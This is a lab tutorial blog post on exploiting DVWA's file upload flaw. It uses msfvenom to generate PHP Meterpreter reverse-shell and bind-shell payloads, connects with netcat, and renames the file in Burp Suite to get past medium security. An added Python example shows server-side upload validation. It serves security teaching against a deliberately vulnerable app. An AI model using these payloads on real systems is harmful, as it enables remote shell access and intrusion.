DVWA 1.9+: File Upload with Metasploit Venom

Miguel Sampaio da Veiga
Published in Hacker Toolbelt
May 17, 2019

This article is about file upload as a security flaw. In previous articles we’ve set up our lab and run several exploits against our target.

You can view those articles here.

File Upload — Low Security

Meterpreter

$ msfvenom -h

$ msfvenom -l payloads | grep php

View more info:

$ msfvenom -p php/meterpreter/reverse_tcp --list-options

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.231.107 LPORT=4444 -o php_venom.php

Remove ‘/*’ from beginning of file.

Upload

Prepare MSF

Execute and

Shell

$ msfvenom -p php/bind_php --list-options

$ msfvenom -p php/bind_php LHOST=192.168.231.107 LPORT=4444 -o php_bind.php

Remove ‘/*’ from the beginning of the file.

Execute

$ nc 192.168.231.110 4444

Got a shell

File Upload — Medium Security

Change DVWA Security to medium and try again.

$ cp php_venom.php php_venom.php.jpg

Try to run:

Let’s hack our file upload. Start Burp Suite with Intercept on.

Return to DVWA and upload the file again. Go to Burp and change the filename:

Then press Forward and go back to the browser to see a successful file upload. Go to hackable/upload and see php_venom.php uploaded. We’ve bypassed the medium security protection!
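
The rename in Burp works because everything in the multipart request, filename and Content-Type included, is chosen by the client. The following is an added example, not DVWA's source and not code from the original article: a server-side validator that ignores request metadata, checks the file's leading bytes against an extension allowlist, and picks the stored name itself. `naive_check`, `validate_upload`, the size limit and the sample inputs are assumptions made up for the illustration.

```python
import os
import secrets

# Allowlist: extension -> leading bytes a file of that type must start with.
MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
}
MAX_BYTES = 100_000  # assumed size limit for this example

# Constructed sample inputs (not captured traffic).
PHP_BODY = b"<?php /* placeholder */ ?>"
JPEG_BODY = b"\xff\xd8\xff\xe0" + b"\x00" * 32


def naive_check(client_type: str) -> bool:
    """Weak pattern: trusts the Content-Type the client put in the request."""
    return client_type in ("image/jpeg", "image/png")


def validate_upload(client_name: str, data: bytes):
    """Return (ok, stored_name_or_reason); the client's Content-Type is ignored."""
    # Drop any path components, then judge only the last extension.
    base = os.path.basename(client_name.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in MAGIC:
        return False, "extension not allowed"
    if not 0 < len(data) <= MAX_BYTES:
        return False, "bad size"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    # Heuristic against image/script polyglots; not a substitute for serving
    # uploads from a location where the server never executes scripts.
    if b"<?php" in data.lower():
        return False, "embedded script tag"
    # Server-chosen name: the request never controls the stored filename.
    return True, secrets.token_hex(16) + ext


if __name__ == "__main__":
    print(naive_check("image/jpeg"))                        # metadata check passes
    print(validate_upload("php_venom.php", PHP_BODY))       # rejected
    print(validate_upload("php_venom.php.jpg", PHP_BODY))   # rejected
    print(validate_upload("photo.JPG", JPEG_BODY))          # accepted, random name
```

With this check in place, the renamed request fails on the extension and the double-extension copy fails on content, while a real image is stored under a name the uploader cannot predict.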

Conclusion

Again, with the help of tools we’ve hacked this target. In the next article we’ll keep at it using another attack vector.
